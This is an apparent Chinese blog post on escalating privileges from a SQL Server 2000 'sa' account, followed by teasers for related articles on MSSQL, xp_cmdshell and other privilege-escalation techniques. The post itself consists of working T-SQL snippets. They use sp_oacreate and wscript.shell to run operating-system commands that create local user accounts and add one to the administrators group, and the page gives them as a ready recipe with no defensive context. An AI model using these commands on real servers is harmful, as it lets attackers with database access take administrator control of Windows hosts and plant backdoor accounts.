sql 2000 数据库SA提权方法

原创 2012年03月23日 23:33:12

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod 
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user wbj wbj /add'


declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'net user 123 123 /add'


declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'net localgroup administrators 123 /add'



MSSQL sa 弱口令提权基础知识学习

https://bbs.ichunqiu.com/thread-23312-1-1.html 1. “扩展存储过程”中的 xp_cmdshell Microsoft SQL...
  • wjy397
  • wjy397
  • 2017年06月29日 13:59
  • 259

Windows下利用MSSQL提权

MSSQL默认运行在system权限上,可以通过xp_cmdshell组件(起桥梁作用)执行系统命令,执行权限继承system权限。   条件:拿到数据库账号密码,且该账号是DBA权限 1、...
  • zminr411421_
  • zminr411421_
  • 2016年08月14日 17:27
  • 967

提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

一、 二、Windwos常见提权
  • u011781521
  • u011781521
  • 2017年03月29日 17:23
  • 3682

提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权

(一)、Mssql提权 必要条件:获取到mssql数据库最高权限用户sa的账号密码 Mssql默认端口:1433 Mssql最高权限用户:sa 得到...
  • u011781521
  • u011781521
  • 2017年03月29日 20:43
  • 1690

ACCESS溢出提权

ACCESS溢出提权 http://hi.baidu.com/xiaosei/item/4925acec904fe62b5a7cfb23 最近入侵了一个ACCESS的站,把...
  • kendyhj9999
  • kendyhj9999
  • 2014年01月24日 17:09
  • 1142

SQL_Server_2012修改sa密码的方法

转载自:http://lichunlong2008.blog.163.com/blog/static/310725492012102532530995/   1、 先用Window身份验证方式登陆...
  • sinat_29581293
  • sinat_29581293
  • 2016年05月11日 18:45
  • 10030

SQL Server中,搭建本地数据库服务,使用sa账户登录失败解决方法

首先选择【Windows身份验证】模式连接数据库引擎。 在建立的连接上右键单击,选择【属性】,进入【服务器属性】界面。在左侧选择页中点击【安全性】,然后在右侧安全性设置界...
  • u012138032
  • u012138032
  • 2016年12月23日 14:14
  • 1715

小白日记21:kali渗透测试之提权(一)--本地提权

本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限。权限提升漏洞通常是一种“辅助”性质的漏洞,当黑客已经通过某种手段进入了目标机器后,可以利用他进入更...
  • ZiXuanFY
  • ZiXuanFY
  • 2016年09月23日 15:44
  • 1346

SQL_Server_2008修改sa密码的方法

转载自:http://lichunlong2008.blog.163.com/blog/static/310725492012102532530995/   1、 先用Window身份验证方式登陆...
  • Templar1000
  • Templar1000
  • 2014年03月01日 12:25
  • 33797

第一次拿到一台肉鸡 -- sql注入和内网端口转发登陆内网服务器

前几天和同事说起网站安全的问题 ,突然想起来大学时无聊热衷于用些注入工具拿到网站后台,上传各种asp网马改别人首页,简直乐此不彼啊 不过也就只能拿到webshell了 ,想进一步提权拿到服务器从未...
  • ymlkl
  • ymlkl
  • 2015年11月20日 17:10
  • 3127
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:sql 2000 数据库SA提权方法
举报原因:
原因补充:

(最多只允许输入30个字)